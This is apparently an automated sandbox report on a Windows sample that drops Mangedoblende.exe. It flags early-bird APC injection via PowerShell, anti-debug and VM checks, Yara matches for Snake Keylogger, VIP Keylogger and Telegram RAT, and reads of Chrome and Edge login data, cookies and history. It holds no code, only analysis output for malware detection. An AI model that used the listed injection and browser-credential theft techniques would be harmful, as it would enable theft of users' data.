            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeAPI call chain: ExitProcess graph end nodegraph_0-3802
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeAPI call chain: ExitProcess graph end nodegraph_0-3806
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeCode function: 6_2_00403F64 SetWindowPos,ShowWindow,GetWindowLongW,ShowWindow,DestroyWindow,SetWindowLongW,GetDlgItem,SendMessageW,IsWindowEnabled,SendMessageW,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,SetClassLongW,SendMessageW,GetDlgItem,ShowWindow,EnableWindow,EnableWindow,GetSystemMenu,EnableMenuItem,SendMessageW,SendMessageW,SendMessageW,lstrlenW,SetWindowTextW,DestroyWindow,CreateDialogParamW,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow,6_2_00403F64
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Early bird code injection technique detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe base: 16D0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe "C:\Users\user\AppData\Local\Temp\Mangedoblende.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Mangedoblende.exe PID: 1292, type: MEMORYSTR
            Yara detected VIP Keylogger
            Source: Yara matchFile source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
